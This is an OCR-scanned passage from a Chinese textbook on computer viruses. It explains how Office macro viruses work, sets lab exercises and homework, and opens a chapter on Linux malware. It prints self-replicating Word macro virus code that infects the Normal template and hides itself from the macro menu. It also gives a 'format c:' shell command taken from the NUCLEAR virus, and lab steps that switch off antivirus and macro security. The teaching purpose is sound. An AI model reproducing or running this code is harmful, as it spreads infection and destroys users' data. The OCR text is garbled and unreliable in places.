O97M. Tristate. C 宏 病毒 可 以 交叉 感染 MS Word 97、MS Excel 97 和 MS PowerPoint 
97 等 多 种 程序 生成 的 数据 文件 。 病 毒 通 过 Word 文档 Excel 电子 表格 或 PowerPoint 幻灯 
片 被 激活 ,并 进行 交叉 感染 。 病 毒 在 Excel 中 被 激活 时 , 它 在 Excel Startup 目录 下 查找 文 
档 BOOK1. XLS, 如 果 不 存 在 ,病毒 将 在 该 目录 下 创建 一 个 被 感染 的 工作 短 并 使 Excel 的 宏 
病毒 保护 功能 失效 。 病 毒 存放 在 被 感染 的 电子 表格 的 “ThisWorkbook” 中 。 

病毒 在 Word 中 被 激活 时 , 它 在 通用 模板 NORMAL. DOT 的 ThisDocument 中 查找 是 
和 否 存在 它 的 代码 ,如 果 不 存在 ,病毒 感染 通用 模板 并 使 Word 的 宏 病 毒 保护 功能 失效 。 病 毒 
在 PowerPoint 中 被 激活 时 ,在 其 模板 BLANK PRESENTATION. POT 中 查找 是 否 存在 模 
块 Triplicate。 如 果 没 找到 ,病毒 使 PowerPoint 的 宏 病 毒 保护 功能 失效 ,同时 添加 一 个 不 可 
见 的 形状 到 第 一 个 幻灯 片 ,并 将 自身 复制 到 模板 。 该 病毒 无 有 效 载荷 ,但 会 将 Word 通用 模 
板 中 的 全 部 宏 移 走 。 在 以 上 3 种 应 用 中 病毒 的 感染 过 程 近似 ,但 在 每 种 应 用 中 的 激活 方式 
不 同 。 


3.4.4 Word 宏 病 毒 的 工作 机 制 


Word 是 通过 模板 来 创建 文件 的 。 模 板 是 为 了 形成 最 终 文档 而 提供 的 特殊 文档 ,模板 
可 以 包括 以 下 几 个 元 素 : 菜单 、 宏 和 格式 。 模 板 是 文本 、 图 形 和 格式 编排 的 蓝图 ,对 于 某 一 
类 型 的 所 有 文档 来 说 ,文本 、 图 像 和 格式 编排 都 是 类 似 的 。Word 提供 了 几 种 常见 文档 类 型 
的 模板 ,如 备忘录 、 报 告 和 商务 信件 。 用 户 可 以 直接 使 用 模板 来 创建 新 文档 ,或 者 加 以 修改 ， 
也 可 以 创建 自己 的 模板 。 一 般 情况 下 ,Word 自动 将 新 文档 基于 默认 的 公用 模板 (Normal. 
dot)。 可 以 看 出 ,模板 在 建立 整个 文档 中 所 起 的 作用 是 作为 一 个 基 类 。 新 文档 继承 了 模板 
的 属性 (包括 宏 ,菜单 和 格式 等 )。 

1. Word 中 的 宏 

Word 处 理 文档 需要 同时 进行 各 种 不 同 的 动作 ,如 打开 文件 .关闭 文件 . 读 取 数 据 资料 
以 及 存储 和 打印 等 。 每 一 种 动作 其 实 都 对 应 着 特定 的 宏 命 令 。 存 文件 对 应 着 FileSave、 改 


第 3 章 传统 计算 机 病毒 77 


名 存 文件 对 应 着 FileSaveAS、 打 印 则 对 应 着 FilePrint。Word 打开 文件 时 , 它 首先 要 检查 是 
否 有 AutoOpen 宏 存 在 ,假如 有 这 样 的 宏 ,Word 就 启动 它 , 除 非 在 此 之 前 系统 已 经 被 “取消 
宏 ”(Disable Auto Macros) 命 令 设置 成 宏 无 效 。 当 然 , 如 果 AutoClose 宏 存在 , 则 系统 在 关 
闭 一 个 文件 时 ,会 自动 执行 它 。 
Word 宏 及 其 运行 条 件 如 表 3-2 所 示 。 
表 3-2 Word 宏 及 其 运行 条 件 


类 别 宏 名 运行 条 件 

AutoExec 启动 Word 或 加 载 全 局 模板 时 
AutoNew 每 次 创建 新 文档 时 

自动 宏 AutoOpen 每 次 打开 已 存在 的 文档 时 
AutoClose 在 关闭 文档 时 
AutoExit 在 退出 Word 或 印 载 全 局 模板 时 
FileSave 保存 文件 

3 FileSaveAs 改名 另存 为 文件 

标准 宏 FilePrint 打印 文件 
FileOpen 打开 文件 


由 自动 宏和 (或 ) 标 准 宏 构 成 的 宏 病 毒 ,其 内 部 都 具有 把 带 病毒 的 宏 移 植 ( 复 制 ) 到 通用 
宏 的 代码 段 ,也 就 是 说 宏 病 毒 通过 这 种 方式 实现 对 其 他 文件 的 传染 。 如 果 某 个 DOC 文件 
感染 了 这 类 Word 宏 病 毒 , 则 当 Word 执行 这 类 自动 宏 时 ,实际 上 就 是 运行 了 病毒 代码 。 当 
Word 系统 退出 时 , 它 会 自动 地 把 所 有 通用 宏 (当然 也 包括 传染 进来 的 宏 病 毒 ) 保 存 到 模板 
文件 中 。 当 Word 系统 再 次 启动 时 , 它 又 会 自动 地 把 所 有 通用 宏 (包括 宏 病毒 ) 从 模板 中 装 
人。 如 此 ,一 旦 Word 系统 遭受 感染 , 则 每 当 系统 进行 初始 化 时 ,都 会 随 着 模板 文件 的 装 入 
而 成 为 带 病毒 的 Word 系统 ,继而 在 打开 和 创建 任何 文档 时 都 会 感染 该 文档 。 

一 旦 宏 病 毒 侵 入 Word 系统 , 它 就 会 替代 原 有 的 正常 宏 ( 如 FileOpen、FileSave、 
FileSaveAs 和 FilePrint 等 ) 并 通过 它们 所 关联 的 文件 操作 功能 获取 对 文件 交换 的 控制 。 当 
某 项 功能 被 调用 时 ,相应 的 宏 病 毒 就 会 算 夺 控制 权 , 实 施 病 毒 所 定义 的 非法 操作 (包括 传染 
操作 及 破坏 操作 等 )。 宏 病毒 在 感染 一 个 文档 时 ,首先 要 把 文档 转换 成 模板 格式 ,然后 把 所 
有 宏 病 毒 (包括 自动 宏 ) 复 制 到 该 文档 中 。 被 转换 成 模板 格式 后 的 染 毒 文件 无 法 转 存 为 任何 
其 他 格式 。 含 有 自动 宏 的 宏 病毒 染 毒 文档 当 被 其 他 计算 机 的 Word 系统 打开 时 , 便 会 自动 
感染 该 计算 机 ,如 图 3-19 所 示 。 


染 的 文档 内 存 局 模板 的 文档 被 感染 


| | 


3-19 ”Word 宏 病毒 的 感染 过 程 


宏 病毒 将 自 
打开 被 感 | es ,| 5 新 建 (打开 ) 


几乎 所 有 已 知 的 宏 病毒 都 沿用 了 相同 的 作用 机 制 。Word 宏 病 毒 几 乎 是 唯一 可 跨越 不 
同 硬件 平台 而 生存 、 传 染 和 流行 的 一 类 病毒 。 如 果 说 宏 病 毒 还 有 什么 局 限 性 的 话 , 那 就 是 这 
些 病毒 必须 依赖 某 个 可 受 其 感染 的 系统 (如 Word、Excel)。 没 有 这 些 特定 的 系统 ,这 些 宏 病 
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毒 便 成 了 无 水 之 鱼 。 由 于 Word 允许 对 宏 本 身 进行 加 密 操作 ,因此 有 许多 宏 病 毒 是 经 过 加 
密 处 理 的 ,不 经 过 特殊 处 理 是 无 法 进行 编辑 或 观察 的 ,这 也 是 很 多 宏 病 毒 无 法 手工 杀 除 的 主 
要 原因 。 

2. Word 宏 语 言 


直到 20 世纪 90 年 代 早 期 ,使 应 用 程序 自动 化 还 是 充满 挑战 性 的 领域 。 对 每 个 需要 自 
动 化 的 应 用 程序 ,人 们 都 不 得 不 学 习 一 种 不 同 的 自动 化 语言 。 例 如 ,可 以 用 Excel 的 宏 语言 
来 使 Excel 自动 化 ,使 用 BASIC 使 Word 自动 化 等 。 微 软 决定 让 它 开 发 出 来 的 应 用 程序 共 
享 一 种 通用 的 自动 化 语言 ,这 种 语言 就 是 Visual Basic for ApplicationsC(VBA) 。 

作为 Visual Basic 家 族 的 一 部 分 ,VBA 于 1993 年 在 Excel 中 首次 发 布 ,并 且 集 成 到 微 
软 的 很 多 应 用 程序 中 。Office 97 及 其 高 版 本 应 用 程序 使 用 VBA 作为 它们 的 宏 语 言 和 编程 
语言 。 现 在 ,超过 80 个 不 同 的 软件 厂商 使 用 VBA 作为 他 们 的 宏 语 言 ,包括 Visio、AutoCAD 
和 Great Plains Accounting。VBA 允许 编程 者 和 终端 用 户 使 用 开放 软件 (多 数 是 Office 程 
序 ) 并 且 定 制 应 用 程序 。 今 天 ,VBA 是 宏 病 毒 制作 者 用 来 感染 Office 文档 的 首选 编程 语言 。 
表 3-3 列 出 了 不 同 的 微软 Office 程序 中 使 用 的 宏 语 言 版 本 。 


表 3-3 Office 程序 和 它们 所 使 用 的 宏 语言 


Office 程序 版 本 宏 语 言 
Word 6. x, 7.x BASIC 
Excel 5. x, 7.x VBA 3.0 
Office 97, Word 8.0, Excel 6.0\8.0, Project 98, Access 8.0 VBA 5.0 
Office 2K, Outlook 2K, FrontPage 2K VBA 6.0 
Office XP, Outlook 2002, Word 2002, Access 2002, FrontPage 2002 VBA 6.3 
Office 2010 VBA 7.0 


读者 可 以 认为 VBA 是 非常 流行 的 应 用 程序 开发 语言 Visual Basic(VB) 的 子 集 。 但 实 
际 上 VBA 是 “寄生 于 ”VB 应 用 程序 的 版 本 。VBA 和 VB 的 区 别 包括 如 下 几 个 方面 。 

(1) VB 是 设计 用 于 创建 标准 的 应 用 程序 ,而 VBA 是 使 已 有 的 应 用 程序 自动 化 。 

(2) VB 具有 自己 的 开发 环境 ,而 VBA 必须 寄生 于 已 有 的 应 用 程序 。 

(3) 要 运行 VB 开发 的 应 用 程序 ,用 户 不 必 安 装 VB, 因 为 VB 开发 出 的 应 用 程序 是 可 
执行 文件 (* .exe) ,而 VBA 开发 的 程序 必须 依赖 于 它 的 母体 应 用 程序 (如 Word 等 )。 

尽管 VBA 和 VB 存在 这 些 不 同 , 但 是 ,它们 在 结构 上 仍然 十 分 相似 。 事 实 上 ,如 果 你 已 
经 了 解 了 VB, 会 发 现 学 习 VBA 非常 快 。 相 应 地 ,学 完 VBA 会 给 学 习 VB 打下 坚实 的 基 
础 。 如 果 读 者 已 经 学 会 在 Excel 中 用 VBA 创建 解决 方案 后 ,也 就 具备 了 在 Word、Access、 
Outlook、 PowerPoint 等 Office 程序 中 用 VBA 创建 解决 方案 的 大 部 分 知识 。VBA 的 一 个 
关键 特征 是 所 学 的 知识 在 微软 的 一 些 产品 中 可 以 相互 转化 。 

更 确切 地 讲 ,VBA 是 一 种 自动 化 语言 , 它 可 以 使 常用 的 程序 自动 化 ,并 且 能 够 创建 自 定 
义 的 解决 方案 。 

使 用 VBA 可 以 实现 如 下 功能 。 

(1) 使 重复 的 任务 自动 化 。 
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(2) 自 定义 Word 工具 栏 . 菜 单 和 界面 。 

(3) 简化 模板 的 使 用 。 

(4) 自 定义 Word, 使 其 成 为 开发 平台 。 

3. 宏 病毒 关键 技术 

接 下 来 的 一 部 分 内 容 简单 介绍 宏 病 毒 中 常用 的 代码 段 。 理 解 这 些 程序 ,有 助 于 分 析 现 
有 宏 病 毒 源 代码 ,也 有 助 于 读者 制作 实验 型 宏 病毒 。 

1) 宏 指令 的 复制 技术 

正如 本 书 第 2 章 所 介绍 的 一 样 ,判断 一 个 系统 是 否 能 产生 恶意 代码 的 必要 条 件 是 “复制 
技术 ”。 也 就 是 说 ,如 果 宏 指 令 不 能 实现 自我 复制 ,黑客 们 就 不 可 能 制造 出 基于 “ 宏 指 令 ” 的 
恶意 代码 。 但 是 ,聪明 的 hacker 实现 了 宏 指 令 的 自我 复制 。 

实现 自我 复制 的 代码 如 下 。 


Micro— Virus 
Sub Document Open() 
On Error Resume Next 
Application. DisplayStatusBar = False 
Options. SaveNormalPrompt = False 
Ourcode = ThisDocument. VBProject.VBComponents(1).CodeModule. Lines(1, 100) 
Set Host = NormalTemplate. VBProject. VBComponents(1). CodeModule 
If ThisDocument = NormalTemplate Then 
Set Host = ActiveDocument. VBProject. VBComponents(1). CodeModule 
End If 
With Host 
If .Lines(1.1) <> "'Micro- Virus" Then 
.DeleteLines 1, .CountOfLines 
,InsertLines 1, Ourcode 
.ReplaceLine 2, "Sub Document_ Close()" 
If ThisDocument = nomaltemplate Then 
.ReplaceLine 2, "Sub Document_ Open()" 
ActiveDocument. SaveAs ActiveDocument. FullName 
End If 
End If 
End With 
MsgBox "MicroVirus by Content Security Lab" 
End Sub 


2) 自动 执行 的 示例 代码 


Sub MAIN 
On Error Goto Abort 
iMacroCount = CountMacros(0, 0) 
// 检 查 是 否 感染 该 文档 文件 
For i = 1 To iMacroCount 
If MacroName $ (i, 0, 0) = "PayLoad" Then 
bInstalled = -1 
// 检 查 正常 的 宏 
End If 
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If MacroName $ (i, 0, 0) = "FileSaveAs" Then 
bTooMuchTrouble=—1 

// 但 如 果 FILESAVEAS 宏 存在 那么 传染 比较 困难 

End If 

Next i 

If Not bInstalled And Not bTooMuchTrouble Then 

// 加 入 FileSaveAs 并 复制 到 AutoExec and FileSaveAs. 
// 有 效 代码 不 检查 是 否 感染 

// 把 代码 加 密使 其 不 可 读 

iWW6IInstance = Val (GetDocumentVar $ ("WH6Infector")) 
sMe$ =FileName$ () 

Macro$ =sMe$ + ":PayLoad" 

MacroCopy Macro $ , "Global :PayLoad", 1 

Macro$ =sMe$ + ":FileOpen" 

MacroCopy Macro $ , "Global:FileOpen", 1 

Macro$ =sMe$ + ":FileSaveAs" 

MacroCopy Macro $ , "Global:FileSaveAs", 1 

Macro$ =sMe$ + ":Autogxec" 

MacroCopy Macro $ , "Global :AutoExec", 1 
SetProfileString "WH6I", Str$ (iWW6IInstance + 1) 
End If 

Rbort: 

End Sub 


3) SaveAs 程序 
SaveAs 是 一 个 当 使 用 FILE/SAVE AS 功能 时 ,复制 宏 病毒 到 活动 文本 的 程序 。 它 使 
用 了 许多 类 似 于 AutoExec 程序 的 技巧 。 尽管 示 例 代码 短小 ,但 足以 制作 一 个 小 巧 的 宏 


病毒 。 


Sub MAIN 


Dim dlg As FileSaveAs 

GetCurValues dlg 

Dialog dlg 

If (Dlg. Format = 0) Or (dlg. Format = 1) Then 
MacroCopy "FileSaveAs", WindowName $ () + ":FileSaveAs" 
MacroCopy "FileSave ", WindowName $ () + ":FileSave" 
MacroCopy "PayLoad", WindowName $ () + ":PayLoad" 
MacroCopy "FileOpen", WindowName $ () + ":FileOpen" 
Dlg. Format =1 

End If 

FileDaveAs dlg 

End Sub 


4) 特殊 代码 
还 有 些 方法 可 以 用 来 隐藏 和 使 你 的 宏 病 毒 更 有 趣 。 当 有 些 人 使 用 TOOLS/MICRO 菜 


单 观察 宏 时 ,该 代码 可 以 达到 掩饰 病毒 的 目的 。 
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Sub MRIN 
On Error Goto ErrorRoutine 
OldName $ = NomFichier $ () 
If macros. bDebug Then 
MsgBox "start ToolsMacro" 
Dim dlg As OutilsMacro 
If macros. bDebug Then MsgBox "1" 
GetCurValues dlg 
If macros. bDebug Then MsgBox "2" 
On Error Goto Skip 
Dialog dlg 
OutilsMacro dlg 
Skip: 
On Error Goto ErrorRoutine 
End If 
REM enable automacros 
DisableAutoMacros 0 
macros. SaveToGlobal (OldName $ ) 
macros. objective 
Goto Done 
ErrorRoutine: 
On Error Goto Done 
If macros. bDebug Then 
MsgBox "error " + Str$ (Err) + " occurred" 
End If 
Done: 
End Sub 


当然 读者 也 可 做 一 些 子 程序 ,并 在 子 程序 中 实现 对 系统 功能 的 调用 。 著 名 的 
NUCLEAR 宏 病 毒 尝 试 编译 外 部 病毒 或 者 一 些 木 马 程序 ,进一步 增加 破坏 功能 。 当 打开 文 
件 时 ,实现 格式 化 硬盘 子 程序 包括 关键 语句 。 


sCmd$ = "echo y|format c: /u" 
Shell Environment $ ("COMSPEC") + "/c" + sCmd$,0 


和 警告 禁止 在 工作 的 计算 机 上 练习 该 语句 ,因为 可 能 会 造成 重大 损失 。 


4. 宏 病毒 的 共性 

(1) 宏 病 毒 会 感 当 文档 文件 和 模板 文件 。 被 宏 病毒 感染 的 文档 属性 必然 会 被 改 为 模板 
而 不 再 是 文档 ,而 用 户 在 执行 另存 文档 操作 时 ,就 无 法 将 该 文档 转换 为 任何 其 他 方式 ,只 能 
用 模板 方式 存盘 。 

(2) 打开 时 激活 ,通过 Normal 模板 传播 。 宏 病毒 的 传染 通常 是 在 Word 打开 一 个 带 宏 
病毒 的 文档 或 模板 时 被 激活 。 接 着 , 它 将 自身 复制 至 Word 的 通用 (Normal) 模 板 中 ,在 随 
后 的 打开 或 关闭 文件 操作 时 宏 病 毒 就 会 把 病毒 从 Normal 模板 复制 到 该 文件 中 。 
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(3) 通过 AutoOpen、AutoClose、AutoNew 和 AutoExit 等 自动 宏 获得 控制 权 。 大 多 数 
宏 病 毒 中 含有 AutoOpen、AutoClose、AutoNew 和 AutoExit 等 自动 宏 。 只 有 这 样 , 宏 病 毒 
才能 获得 文档 (模板) 操作 控制 权 。 有 些 宏 病毒 还 通过 FileNew、 FileOpen、 FileSave、 
FileSaveAs 以 及 FileExit 等 宏 来 控制 文件 的 操作 。 

(4) 宏 病 毒 中 必然 含有 对 文档 读 写 操作 的 宏 指令 。 宏 病毒 的 传播 过 程 必然 要 对 文档 进 
行 读 写 操作 ,以 把 病毒 本 身 的 宏 命 令 插 入 宿主 文档 中 ,因此 ,病毒 宏 中 都 含有 对 文档 的 读 写 
宏 指 令 。 


5. 宏 复制 实验 
该 实验 基于 “ 宏 指 令 的 复制 技术 ”代码 ,详细 的 实验 步 又 如 下 。 
【实验 目的 】 


(1) 演示 宏 的 编写 。 

(2) 说 明 宏 的 原理 及 其 安全 漏洞 和 缺陷 。 

(3) 理解 宏 病毒 的 作用 机 制 。 

【实验 环境 】 

(1) Windows 系列 操作 系统 。 

(2) Word 2003 应 用 程序 。 

【实验 步骤 】 

(1) 软件 设置 : 关闭 杀毒 软件 的 自动 防护 功能 。 

(2) 打开 Word 2003, 在 “工具 ”一 “ 宏 ”" 一 “安全 性 ”中 ,将 安全 级 别 设置 为 低 ,在 可 靠 发 
行商 选项 卡 中 ,选择 信任 任何 所 有 安装 的 加 载 项 和 模板 ,选择 信任 visual basic 项 目的 访问 。 

(3) 自我 复制 功能 演示 。 打 开 一 个 Word 文档 ,然后 按 Alt 十 Fl11 组 合 键 调用 宏 编 写 窗 
口 (“工具 ”一 “ 宏 ”>Visual Basic>“ 宏 编辑 器 ”) ,在 左 侧 的 Project->“Microsoft Word 对 象 "一 
ThisDocument 中 输入 源 代码 (参见 源 代码 一 或 者 从 下 载 文件 中 复制 ,位 置 为 : 本 书 配套 素 
材 目 录 \ Experiment\macro\macro_1. txt) ,保存 。 此 时 当前 Word 文档 就 含有 宏 病 毒 ,只 要 
下 次 打开 这 个 Word 文档 ,就 会 执行 以 上 代码 ,并 将 自身 复制 到 Normal. dot(Word 文档 的 
公共 模板 ) 和 当前 文档 的 This Document 中 ,同时 改变 函数 名 (模板 中 为 Document_Close， 
当前 文档 为 Document_Open) 。 此 时 所 有 的 Word 文档 打开 和 关闭 时 ,都 将 运行 以 上 的 病 
毒 代 码 , 可 以 加 入 适当 的 恶意 代码 ,影响 Word 的 正常 使 用 ,本 例 中 只 是 简单 地 弹出 一 个 提 
示 框 。 

(4) 清除 宏 病 毒 。 对 每 一 个 受 感染 的 Word 文档 进行 如 下 操作 。 

打开 受 感染 的 Word 文档 ,进入 宏 编 辑 环 境 (Alt 十 F11), 打 开 Normal> Microsoft 
Word 对 象 习 This Document ,清除 其 中 的 病毒 代码 (只 要 删除 所 有 内 容 即 可 ) 。 

然后 打开 Project>Microsoft Word 一 This Document, 清除 其 中 的 病毒 代码 。 

实际 上 ,模板 的 病毒 代码 只 要 在 处 理 最 后 一 个 受 感染 文件 时 清除 即 可 ,然而 清除 模板 病 
毒 后 ,如 果 重 新 打开 其 他 已 感染 文件 ,模板 将 再 次 被 感染 ,因此 为 了 保证 病毒 被 清除 ,可 以 查 
看 每 一 个 受 感染 文档 的 模板 ,如 果 存 在 病毒 代码 ,就 进行 一 次 清除 。 
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3.5 综合 实验 
综合 实验 一 : 32 位 文件 型 病毒 实验 


本 实验 是 根据 3. 3. 2 节 的 文件 型 病毒 编制 技术 设计 的 原型 病毒 。 之 所 以 设计 成 原型 病 
毒 , 是 因为 考虑 到 信息 安全 课程 的 特殊 性 。 学 习 病 毒 原理 的 目的 是 为 了 更 好 地 防治 病毒 ,而 
不 是 教 读 者 编写 能 运行 于 实际 环境 的 病毒 。 

【实验 目的 】 

(1) 了 解 文件 型 病毒 的 基本 制作 原理 。 

(2) 了 解 病毒 的 感染 、 破 坏 机 制 ,进一步 认识 病毒 程序 。 

(3) 掌握 文件 型 病毒 的 特征 和 内 在 机 制 。 

【实验 环境 】 

Windows 2000、Windows 9x、Windows NT 和 Windows XP。 

【实验 步骤 】 

文件 位 置 : 本 书 配套 素材 目录 \Experiment\win32virus。 目 录 中 的 virus. rar 包 中 包括 
Virus. exe( 编 译 的 病毒 程序 ) 、 软 件 使 用 说 明 书 . doc( 请 仔细 阅读 ) 、 源 代码 详解 . doc( 对 代码 
部 分 加 入 了 部 分 注释 ) 以 及 pll. asm( 程 序 源 代码 ) 。Example. rar 包 中 选择 的 是 一 个 常用 程 
序 (ebookedit) 安 装 后 的 安装 目录 下 的 程序 ,用 于 测试 病毒 程序 。 

预备 步骤 : 将 example. rar 解压 缩 到 某 个 目录 ,如 D: \virus\example。 解 压 完毕 后 ,应 
该 在 该 目录 下 有 Buttons 目录 、ebookcode. exe、ebookedit. exe、 ebrand-it. exe 以 及 
keymaker. exe 等 程序 ,然后 把 virus. rar 包 解 压 后 的 Virus. exe 复制 到 该 目录 中 。 

实验 内 容 : 通过 运行 病毒 程序 观看 各 步 的 提示 以 了 解 病毒 的 内 在 机 制 。 详 细 的 演示 步 
又 参见 教学 PPT。 

【实验 注意 事项 】 

(1) 本 病毒 程序 用 于 实验 目的 ,请 妥善 使 用 。 

(2) 在 测试 病毒 程序 前 ,请 先 关 闭 杀毒 软件 的 自动 防护 功能 或 直接 关闭 杀毒 软件 。 

(3) 本 程序 是 在 开发 时 面向 实验 演示 用 的 ,侧重 于 演示 和 说 明 病 毒 的 内 在 原理 ,破坏 功 
能 有 限 ; 而 目前 流行 的 病毒 破坏 方式 比较 严重 ,而 且 发 作 方 式 非 常 隐 蔽 , 千 万 不 要 对 其 他 病 
毒 程序 采用 本 例 的 方式 来 进行 直接 运行 测试 。 

(4) 测试 完毕 后 ,请 注意 病毒 程序 的 清除 ,以 免 误 操作 破坏 计算 机 上 的 其 他 程序 。 


综合 实验 二 : 类 TaiWan No. 1 病毒 实验 


【实验 目的 】 

(1) 演示 宏 的 编写 。 

(2) 说 明 宏 的 原理 及 其 安全 漏洞 和 缺陷 。 
(3) 理解 宏 病 毒 的 作用 机 制 。 

【实验 环境 】 

(1) Windows 系列 操作 系统 。 
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(2) Word 2003 应 用 程序 。 

【实验 步骤 】 

(1) 软件 设置 : 关闭 杀毒 软件 的 自动 防护 功能 。 

(2) 打开 Word 2003, 在 “工具 ”>“ 宏 ”一 “安全 性 ”中 ,将 安全 级 别 设置 为 低 ,在 可 靠 发 
行商 选项 卡 中 ,选择 信任 任何 所 有 安装 的 加 载 项 和 模板 ,选择 信任 visual basic 项 目的 访问 。 

(3) 类 台湾 1 号 病毒 。 代 码 位 置 为 本 书 配 套 素材 目录 : \ Experiment\macro\macro_2. txt。 

该 病毒 的 效果 为 , 当 打 开 被 感染 的 Word 文档 时 ,首先 进行 自我 复制 ,感染 Word 模板 ， 
然后 检查 日 期 ,判断 是 否 为 1 日 ( 即 在 每 月 的 1 日 会 发 作 ) ,然后 弹出 一 个 对 话 框 , 要 求 用 户 
进行 一 次 心算 游戏 ,这 里 只 用 四 个 小 于 10 的 数 相 乘 ,如 果 计 算 正 确 , 那 么 就 会 新 建 一 个 文 
档 ,出 现 如 下 字幕 :“ 何 谓 宏 病毒 ,答案 : 我 就 是 ……; 如 何 预 防 宏 病 毒 ,答案 : 不 要 看 我 …… ” 
如 果 计 算 错 误 , 新 建 20 个 写 有 “ 宏 病 毒 " 字 样 的 Word 文档 ,然后 再 一 次 进行 心算 游戏 , 共 进 
行 3 次 ,然后 跳出 程序 。 关 闭 文档 的 时 候 也 会 执行 同样 的 询问 。 

(4) 清除 宏 病毒 。 对 每 一 个 受 感染 的 Word 文档 进行 如 下 操作 。 

打开 受 感染 的 Word 文档 ,进入 宏 编辑 环境 (Alt 十 Fl11) ,打开 Normal 一 Microsoft 
Word 对 象 -This Document ,清除 其 中 的 病毒 代码 (只 要 删除 所 有 内 容 即 可 ) 。 

然后 打开 Project>Microsoft Word-~This Document, 清除 其 中 的 病毒 代码 。 

实际 上 ,模板 的 病毒 代码 只 要 在 处 理 最 后 一 个 受 感染 文件 时 清除 即 可 ,然而 清除 模板 病 
毒 后 ,如果 重新 打开 其 他 已 感染 文件 ,模板 将 再 次 被 感染 ,因此 为 了 保证 病毒 被 清除 ,可 以 查 
看 每 一 个 受 感染 文档 的 模板 ,如 果 存 在 病毒 代码 ,就 进行 一 次 清除 。 


3.6 习 题 


一 、 填空 题 

1. 在 DOS 操作 系统 时 代 , 计 算 机 病毒 可 以 分 成 和 两 大 类 。 

2. Word 宏 病 毒 是 一 些 制作 病毒 的 专业 人 员 利 用 Microsoft Word 的 开放 性 专门 制作 
的 一 个 或 多 个 具有 病毒 特点 的 宏 的 集合 ,这 种 宏 病 毒 的 集合 影响 到 计算 机 的 使 用 ,并 能 通 


过 及 进行 自我 复制 及 传播 。 

二 、 选择 题 

1. 在 Windows 32 位 操作 系统 中 ,其 EXE 文件 中 的 特殊 标识 为 ( ) 。 
A. MZ B; PE C. NE D. LE 

2. 能 够 感染 EXE 文件 和 COM 文件 的 病毒 属于 ( 。”)。 
A. 网 络 型 病毒 B. 蠕虫 型 病毒 
C. 文件 型 病毒 D. 系统 引导 型 病毒 

3. 第 一 个 真正 意义 的 宏 病 毒 起 源 于 ( ) 应 用 程序 。 
A. Word B. Lotus 1-2-3 C Excel D. PowerPoint 
、 思 考题 


1. 通过 程序 语言 直接 操控 计算 机 底层 硬件 是 计算 机 病毒 创作 者 所 不 断 追 求 的 。 讨 论 
一 下 ,在 DOS、Windows 9x 系列 和 Windows NT 系列 系统 下 如 何 操作 底层 硬件 设备 。 
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2. 
3. 
4. 


在 32 位 Windows 系统 下 ,编制 一 个 原理 型 的 计算 机 病毒 最 基本 的 步骤 有 了 哪些 ? 
作为 一 类 曾经 非常 流行 的 病毒 ,论述 宏 病毒 的 特点 。 
根据 宏 病毒 的 特征 ,试探 讨 宏 病毒 的 存在 环境 。 


四 、 实 操 题 


A oo 


. 在 现 有 操作 系统 上 安装 虚拟 机 软件 ,并 在 虚拟 机 中 安装 DOS 7. 1 操作 系统 。 
. 学 习 并 实践 引导 型 病毒 原理 。 

. 学 习 并 实践 COM 文件 型 病毒 原理 。 

. 编译 并 运行 PE 文件 格式 查看 程序 ,完成 该 实验 。 

. 上 机 实践 32 位 文件 型 病毒 实验 。 

. 在 Word 2003 环境 下 ,用 宏 代码 实现 宏 命 令 的 自我 复制 功能 。 

. 掌握 并 实验 类 台湾 1 号 宏 病毒 。 


Linux 恶意 代码 技术 


ee a da 二 天 的 网 镶 *CBliss》 出 更。 三 ne 


系统 ”的 印象 。 此 后 ， 广 自 且 定 和 各 Lion 蠕虫 、 跨 Windows i Linux 本 全 W32. Winux 
(又 名 W32. Lindoes 或 W32. PEEIf. 2132) 等 病毒 。 虽 然 这 些 病毒 的 传播 速度 及 破坏 性 和 
Windows 操作 系统 下 的 病毒 比 起 来 还 有 很 大 的 距离 ,但 是 这 些 病 毒 的 出 现 说 明了 Linux 已 
经 不 再 是 没有 病毒 的 避风 港 。 

实际 上 ,没有 一 个 操作 系统 可 以 完全 抵御 计算 机 病毒 的 侵扰 。 一 个 病毒 可 以 完全 依靠 
系统 本 身 进 行 复制 ,例如 ,利用 Windows 操作 系统 的 PE 格式 的 可 执行 文件 和 利用 类 Linux 
操作 系统 的 ELF 格式 文件 。 所 以 ,任何 计算 机 病毒 都 依附 于 操作 系统 的 体系 结构 ,各 种 操 
作 系 统 病毒 的 写法 都 不 一 样 ,但 任何 操作 系统 都 逃避 不 了 病毒 ,这 当然 也 包括 Linux。 

正如 以 上 所 说 ,就 像 Windows NT 或 者 Mac OS 这 样 的 操作 系统 一 样 ,Linux 也 可 以 被 
感染 。 有 人 也 许 会 奇怪 ,事实 上 第 一 个 计算 机 病毒 是 UNIX 病毒 。 在 20 世纪 80 年 代 , 还 是 
南 加 州 大 学 在 读 研究 生 的 Fred Cohen, 在 UNIX 系统 下 编写 了 第 一 个 会 自动 复制 并 在 计算 
机 间 进 行 传染 从 而 引起 系统 死机 的 病毒 ,因此 被 誉 为 "计算 机 病毒 之 父 ”。 由 于 类 Linux 系 
统 具 有 内 存 保 护 机 制 , 因 此 人 们 不 太 相 信 类 Linux 系统 上 病毒 的 危害 性 会 超过 Windows 和 
DOS 系统 ,但 他 们 错 了 。 

本 章 学 习 目 标 

(1) 了 解 Linux 的 安全 问题 。 

(2) 掌握 Linux 病毒 的 概念 。 

(3) 掌握 Linux 下 的 脚本 病毒 。 

(4) 掌握 ELF 病毒 感染 方法 。 


4.1 Linux 系统 的 公共 误区 


一 个 最 大 的 误区 就 是 认为 高 性 能 的 安全 操作 系统 可 以 预防 计算 机 病毒 。 在 DOS 时 期 ， 
利用 DOS 系统 与 它 本 身 并 不 存在 任何 内 存 和 数据 保护 机 制 的 原理 编制 病毒 ,所 以 当时 的 病 
毒 可 以 完全 控制 计算 机 的 所 有 资源 。 的 确 , 它 们 会 很 轻易 地 成 为 DOS 和 简单 的 Windows 
操作 系统 的 完全 控制 用 户 。 这 说 明 没 有 内 存 保 护 机 制 和 数据 保护 机 制 ,计算 机 病毒 可 以 夺 
取 所 有 的 计算 机 控制 权 。 相 对 来 说 ,Windows NT 和 Linux 系统 是 具备 高 级 保护 机 制 的 系 
统 。 这 可 以 预防 大 多 数 的 病毒 的 传染 ,但 不 能 预防 所 有 的 病毒 。 当 一 个 用 户 以 root 或 
Administrator 的 身份 来 操作 的 时 候 , 这 些 系统 的 保护 机 制 实际 上 是 没有 用 的 。 一 个 设计 得 


中 也 有 人 认为 Staog 是 Linux 下 的 第 一 个 病毒 。 其 实 ,Morris 创作 的 蠕虫 更 早 。 
